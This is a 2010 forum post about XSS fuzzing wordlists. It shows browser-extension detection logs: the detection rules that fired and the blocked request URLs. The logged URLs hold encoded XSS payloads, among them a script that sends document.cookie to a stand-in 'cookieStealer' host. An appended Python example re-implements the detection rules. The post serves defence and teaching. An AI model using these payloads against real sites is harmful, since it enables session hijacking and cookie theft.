Author Topic: Pentest with wfuzz...  (Read 2714 times)

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33810
  • malware fighter
Pentest with wfuzz...
« on: July 18, 2010, 09:20:41 PM »
Hi malware fighters,

link here: http://code.google.com/p/wfuzz/source/browse/trunk/wordlist/Injections/XSS.txt?r=2
and another database here: http://www.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&setlang=en
and here: http://airodump.net/xss-pentest-plugin-cross-site-scripting/
or here: http://www.allinfosec.com/2010/06/16/wowbb-1-7-xss-vulnerabilities-3/

All checked and blocked by my Firekeeper lists, example:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
htxp://www.google.com/search?client=flock&channel=fds&q=%27%253CIFRAME%2520SRC%3Djavascript%3Aalert%28%252527XSS%252527%29%253E%253C%2FIFRAME%253E+%22%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2FcookieStealer%2Fcgi-bin%2Fcookie.cgi%3F%27%2Bdocument.cookie%3C%2Fscript%3E&ie=utf-8&oe=utf-8&aq=t

and a good read: http://www.xc0re.net/index.php?p=1_10_Knowledge-Core
Mind you when it starts with " it does not work.....

Just one more example:
=== Triggered rule ===
alert(url_content:"javascript:"; nocase; msg:"javascript: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
http://pmw90687.surfcanyon.com/queryReformulation?partner=wot&authCode=pmw90687&format=jsonp&callback=contentscript.callback1&q=%3Ciframe+src=%E2%80%9Djavascript:document.vulnerable=true;
NoScript alerts and filters this one out...

And they come in all devious forms, like:
=== Triggered rule ===
alert(url_content:"%3CSCRIPT"; nocase; msg:"<script> tags GET request cross site scripting attempt"; url_re:"/%3Cscript.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
htxp://www.google.com/search?client=flock&channel=fds&q=admin+anubis%257C%257C9f55c7e99c128fb18b0ce725a8c2bdea+%3Cscript%3E&ie=utf-8&oe=utf-8&aq=t


polonus
« Last Edit: July 19, 2010, 12:05:00 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
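
Added example, not part of the original post and not Firekeeper's own code: a Python approximation of the two rules quoted above, run over constructed URLs, comparing matching on the raw URL with matching after percent-decoding until the string is stable. The function names, the `example.test` host and the reading of `url_content` and `url_re` as a case-insensitive substring test and a regex on the raw URL are assumptions.

```python
import re
from urllib.parse import unquote

# Approximation of the two quoted rules (assumption: url_content + nocase is a
# case-insensitive substring test, url_re a regex, both applied to the raw URL).
def match_raw(url):
    hits = []
    if "%3cscript" in url.lower() and re.search(r"%3Cscript.*%3E", url, re.I):
        hits.append("script-tag")
    if "javascript:" in url.lower():
        hits.append("javascript-uri")
    return hits

def fully_decode(url, max_rounds=5):
    """Percent-decode until the string stops changing (bounded): %253C -> %3C -> <."""
    for _ in range(max_rounds):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url

def match_normalized(url):
    """The same two checks, applied to the fully decoded URL."""
    text = fully_decode(url)
    hits = []
    if re.search(r"<script.*>", text, re.I):
        hits.append("script-tag")
    if "javascript:" in text.lower():
        hits.append("javascript-uri")
    return hits

# Constructed sample URLs modelled on the requests in the post
# (example.test is a placeholder host).
SAMPLES = [
    "http://example.test/search?q=admin+%3Cscript%3E",           # single-encoded tag
    "http://example.test/search?q=%253Cscript%253E",             # double-encoded tag
    "http://example.test/r?q=%3Ciframe+src=javascript%3Adocument.vulnerable=true",
    "http://example.test/search?q=javascript+tutorial",          # benign query
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(f"raw={match_raw(url)!s:18} normalized={match_normalized(url)!s:20} {url}")
```

The double-encoded tag and the encoded colon in `javascript%3A` only match after normalization, while the benign query matches in neither mode.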